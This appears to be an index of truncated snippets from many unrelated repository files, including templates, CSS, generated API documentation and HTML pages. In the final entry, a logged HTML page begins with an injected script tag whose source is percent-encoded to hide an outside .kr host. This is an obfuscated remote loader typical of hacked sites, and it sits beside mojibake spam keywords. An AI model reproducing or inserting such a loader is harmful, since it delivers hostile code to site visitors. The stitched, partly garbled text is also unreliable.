<template name="allParticipants"> <div class="page-header"> <h1>{{_ 'allParticipants'}}</h1> </div> <div class="row buttons-bar"> <div class="col-md-12"> <a class="btn btn-primary" href="{{pathFor 'newParticipant'}}">{{_ 'new'}}</a> </div> </div> <div class="row"> {{#each participants}}...
sites/all/themes/BestThemeEver/css/navigation-rtl.css
drnikki/dotorg
/** * @file * RTL companion for the navigation.css file. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/work\/drnikki\.org\/sites\/all\/themes\/BestThemeEver\/sass\/navigation-rtl\.scss}line{font-family:\000039}} ul li.collapsed { list-style-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA...
solr-5.0.0/docs/solr-core/org/apache/solr/search/join/class-use/BlockJoinChildQParserPlugin.html
annieweng/solr_example
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Sun Feb 15 12:26:30 PST 2015 --> <meta http-equiv="Content-Type" content="text/html" charset="utf-8"> <title>Uses of Class org.a...
TTTProj/doc/edu/up/cs301/tictactoe/package-summary.html
MaxRobinson/Phase10
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_31) on Wed Oct 30 12:20:16 PDT 2013 --> <TITLE> edu.up.cs301.tictactoe </TITLE> <META NAME="date" CONTENT="2013-10-30"> <LINK REL ="stylesheet" TYP...
arm-2010.09/share/doc/arm-arm-none-eabi/html/as.html/TIC54X_002dSubsyms.html
GeeteshKhatavkar/gh0st_kernel_samsung_royxx
<html lang="en"> <head> <title>TIC54X-Subsyms - Using as</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="Using as"> <meta name="generator" content="makeinfo 4.13"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="TIC54X_002dDependent.html#TIC54X_00...
api/4.0/functions_e.html
inspircd/inspircd.github.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" co...
docs/docs_doxygen/html/functions_k.html
hbgit/Map2Check
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
pagechecker.html
taq/pagechecker
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>PageChecker test</title> <script type="text/javascript" charset="utf-8" src="pagechecker.js"></script> <script type="text/javascript" charset="utf-8" src="javascripts/jquery-1.11.0.min.js"></script> <script type="text/javascript" chars...
lib/xalan-j_2_7_0/docs/apidocs/org/w3c/dom/css/class-use/CSS2Properties.html
MrStaticVoid/iriverter
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc on Sat Aug 06 17:04:43 EDT 2005 --> <TITLE> Xalan-Java 2.7.0: Uses of Interface org.w3c.dom.css.CSS2Properties </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> </H...
doc/help/functions/timespan.from-days(System.Double).html
Sectoid/debian-nant
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- Documenting FromDays--> <head> <meta http-equiv="Content-Language" content="en-ca" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />...
149-2007/blog/16/feed/index.html
kfitz/machines
<?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://machines.plannedobsolescence.net/149-2007" xmlns:dc="http://purl.org/dc/elements/1.1/"> <channel> <title>blankman&#039;s blog</title> <link>http://machines.plannedobsolescence.net/149-2007/blog/16</link> <description></description> <language...
app/views/external/notFound.scala.html
fullwall/Ticketeer
@externalMain("Page not found") { <div class="container center-block text-center"> <h1>Oops.</h1> <h4>The page you're looking for doesn't exist.</h4> </div> }
remote/css/reset.css
david855033/david855033.github.io
html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, ...
gcc-linaro/share/doc/libgomp.html/omp_005fget_005fnum_005fprocs.html
SubhrajyotiSen/HelioxKernelHarpia
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <!-- Copyright (C) 2006-2016 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later...
Project_EMS/WebContent/testUpdDept.html
oneyufei/Employee-Management-System
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>UpdateDepartment</title> <link rel="stylesheet" type="text/css" href="UpdDept.css" media="screen" /> <script type="text/ja...
frameworks/prado/docs/manual/class-TDbColumnCaseMode.html
tejdeeps/tejcs.com
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="ApiGen 2.8.0" /> <meta http-equiv="content-language" content="en" /> <meta name="Keywords" content="PRADO PHP framework component template delphi asp.net event property OOP PHP5 objec...
templates/machinetracker/ip_tracker.html
sigmunau/nav
<table id="tracker-table" class="listtable tablesorter"> <caption> IP search results {% if not disable_ip_context %} &ndash; <span class="subtitle">From {{ subnet_start }} to {{ subnet_end }}</span> {% endif %} <span class="subtitle right"> {{ ip_...
doc/html/class_id-members.html
flouvat/iZi
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>Easy prototyping of pattern mining algorithms: Member List</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" ...
wulu/2015.11.23/qipai/qipaiyouxipingtai/1631.html
bylu/Test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÒÚ¿áÆåÅÆÊÀ½ç¹Ù·½ÏÂÔØ£¬¸ÐÊÜ¿áìÅÆåÅÆÊÀ½ç</title> <meta name="keywords" content="ÒÚ¿á,ÆåÅÆ,ÊÀ½ç,¹Ù·½,ÏÂÔØ,¸ÐÊÜ...
layouts/sidebar-content.css
n8finch/design-lab-wordpress-landing-page-theme
/* * Theme Name: Landing Page One Pager * * Layout: Sidebar-Content * * Learn more: https://developer.wordpress.org/themes/basics/template-files/ */ .content-area { float: right; margin: 0 0 0 -25%; width: 100%; } .site-main { margin: 0 0 0 25%; } .site-content .widget-area { float: left; overflow: hidden; ...
logs/site-nipponki/02021652963.html
ForAEdesWeb/AEW25
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×...